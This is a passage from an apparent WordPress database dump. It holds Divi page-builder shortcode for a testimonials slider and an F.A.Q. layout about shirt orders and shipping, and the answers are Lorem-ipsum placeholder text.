heading=\"This is unbelievable. After using Testimonial Generator my business skyrocketed!\" background_position=\"default\" background_size=\"default\" background_color=\"#ffffff\" use_bg_overlay=\"off\" use_text_overlay=\"off\" alignment=\"center\" background_layout=\"light\" allow_player_pause=\"off\" text_border_radius=\"3\" header_font_select=\"default\" header_font=\"||||\" body_font_select=\"default\" body_font=\"||||\" custom_button=\"off\" button_font_select=\"default\" button_font=\"||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" header_line_height=\"1.5em\" header_line_height_tablet=\"1.2em\" header_line_height_phone=\"1.2em\"]\r\n\r\n<p style=\"text-align: center\"><img class=\"alignnone size-full wp-image-4859\" style=\"margin-top: 40px;margin-bottom: 10px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/008.png\" alt=\"008\" width=\"90\" height=\"90\"><br> Mick A.</p>\r\n\r\n[/et_pb_slide]\r\n\r\n[/et_pb_slider][/et_pb_column][/et_pb_row][/et_pb_section]','Testimonials Slider','','publish','closed','closed','','testimonials-slider','','','2016-05-30 21:21:56','2016-05-30 21:21:56','',0,'https://companyregistration.online/et_pb_layout/testimonials-slider/',0,'et_pb_layout','',0),(25341,1,'2016-06-29 02:23:41','2016-06-29 02:23:41','[et_pb_section admin_label=\"section\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_padding=\"0px||0px|\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"144px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_width_px=\"940px\" custom_padding_tablet=\"60px||0px|\" custom_padding_last_edited=\"on|desktop\" disabled=\"off\" disabled_on=\"on|on|\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans|on|||\" text_text_color=\"#888888\" text_line_height=\"1.6em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" max_width=\"820px\" custom_css_main_element=\"font-weight: 600;\" text_font_size_last_edited=\"on|phone\"]\r\n\r\n<p>F.A.Q.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"13px||150px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding_last_edited=\"on|tablet\" custom_padding_tablet=\"60px||70px|\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans|on|||\" text_font_size=\"5em\" text_text_color=\"#222222\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" text_font_size_tablet=\"40px\" text_font_size_last_edited=\"on|tablet\" max_width=\"950px\"]\r\n\r\n<p>Here are some common questions about Elegant.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f7f7\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_padding=\"0px||0px|\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"130px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_tablet=\"90px||0px|\" custom_padding_last_edited=\"on|tablet\"][et_pb_column type=\"1_4\"][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"8\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans|on|||\" text_font_size=\"36px\" text_text_color=\"#222222\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" text_font_size_last_edited=\"on|tablet\" custom_margin=\"-10px||0px|\" custom_padding=\"0px||0px|\" text_font_size_tablet=\"32px\"]\r\n\r\n<p>Getting<br /> Started</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"3_4\"][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"How is my price determined?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"2px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"Can I get my order sooner?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"What file-format should I submit?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"What is your minimum order quantity?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"What is your minimum order quantity?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"6\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"128px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_tablet=\"90px||0px|\" custom_padding_last_edited=\"on|tablet\"][et_pb_column type=\"1_4\"][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"8\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans|on|||\" text_font_size=\"36px\" text_text_color=\"#222222\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" text_font_size_last_edited=\"on|tablet\" custom_margin=\"-10px||0px|\" custom_padding=\"0px||0px|\" text_font_size_tablet=\"32px\"]\r\n\r\n<p>Shipping</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"3_4\"][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"How will my shirts ship?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"2px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"Can you deliver my shirts if I am local?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"Can I come pick up my shirts?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"Can you ship internationally?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"6\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"128px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_tablet=\"90px||0px|\" custom_padding_last_edited=\"on|tablet\"][et_pb_column type=\"1_4\"][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"8\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans|on|||\" text_font_size=\"36px\" text_text_color=\"#222222\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" text_font_size_last_edited=\"on|tablet\" custom_margin=\"-10px||0px|\" custom_padding=\"0px||0px|\" text_font_size_tablet=\"32px\"]\r\n\r\n<p>Shipping</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"3_4\"][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"How will my shirts ship?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"2px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"Can you deliver my shirts if I am local?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"Can I come pick up my shirts?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"0\"]\r\n\r\n\r\n\r\n[/et_pb_divider][et_pb_toggle admin_label=\"Toggle\" title=\"Can you ship internationally?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#666666\" use_border_color=\"on\" border_color=\"#f7f7f7\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#f7f7f7\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#f7f7f7\" closed_toggle_text_color=\"#000000\" icon_color=\"#000000\" custom_padding=\"30px|0px|2px|0px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_tablet=\"18\" title_font_size_last_edited=\"on|tablet\"]\r\n\r\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\r\n\r\n[/et_pb_toggle][et_pb_divider admin_label=\"Divider\" color=\"#222222\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"4\" hide_on_mobile=\"off\" height=\"6\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"128px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_tablet=\"90px||0px|\" 